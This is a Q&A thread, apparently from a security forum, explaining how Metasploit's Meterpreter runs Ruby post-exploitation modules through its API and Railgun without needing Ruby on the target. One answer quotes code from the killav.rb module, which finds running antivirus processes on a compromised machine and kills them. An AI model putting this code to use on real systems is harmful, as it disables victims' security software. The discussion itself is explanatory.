6

I've been using the Meterpreter for some time and I'm still quite new to it and one of the questions I have is how it's module loading works.

Correct me if I'm wrong as I'm still learning how to use Metasploit, but to the best of my knowledge I know that the modules that you can load onto the Meterpreter such as killav.rb are written in Ruby. This module is supposed to be loaded onto the Meterpreter and executed.

How is the Ruby script executed if the Ruby interpreter does not exist on the system? Sorry if my question sounds basic or if what I know is wrong as I'm just getting into using Metasploit.

e-sushi
  • 1,296
  • 2
  • 14
  • 41
eclipse
  • 83
  • 4

2 Answers2

3

The code doesn't actually run on the remote host. The ruby module is executed on your machine and uses the Metasploit api to execute code on the other side. The Metasploit api has alot of windows apis mapped as rpc calls (called railgun). Meteterpter is written in cpp, there is no ruby component or embedding done on the "client" side. Read more here: How to use Railgun for Windows post exploitation.

GAD3R
  • 2,211
  • 3
  • 15
  • 38
Jonathan Allon
  • 721
  • 3
  • 14
2

Let's start with the basic understanding, once you have a meterpreter you get access to the modules of metasploit that perform post exploitation activites. Now any activity that you initiate lets say killav.rb. The code in this file is interacting with metasploit meterpreter module that you have and it uses RailGun. Railgun is a very powerful post exploitation feature exclusive to Windows Meterpreter. It allows you to have complete control of your target machine's Windows API. It passes the instruction to the Target system. Let me give you an insight to the code of killav.rb

 def run
    avs = ::File.read(::File.join(Msf::Config.data_directory, 'wordlists',
                                  '***av_hips_executables.txt***')).strip
    avs = Set.new(avs.split("\n"))

    processes_found = 0
    processes_killed = 0
    client.sys.process.get_processes().each do |x|
      next if skip_process_name?(x['name'].downcase)
      vprint_status("Checking #{x['name'].downcase} ...")
      if avs.include?(x['name'].downcase)
        processes_found += 1
        print_status("Attempting to terminate '#{x['name']}' (PID: #{x['pid']}) ...")
        begin
          client.sys.process.kill(x['pid'])
          processes_killed += 1
          print_good("#{x['name']} terminated.")
        rescue Rex::Post::Meterpreter::RequestError
          print_error("Failed to terminate '#{x['name']}' (PID: #{x['pid']}).")
        end
      end
    end

If you notice the av_hips_executables.txt

(Note:This file will also be available in the metasploit app location /usr/share/metasploit-framework/data/wordlists/av_hips_executables.txt)

That file contains the list of all the known executables that are assosiated with a runnning Antivirus,the code after that is purely to detect its PID and kill the PID. And since all is passed via the meterpreter API. It does not depend on the client side if it has ruby or not.

Dhruv Shah
  • 46
  • 3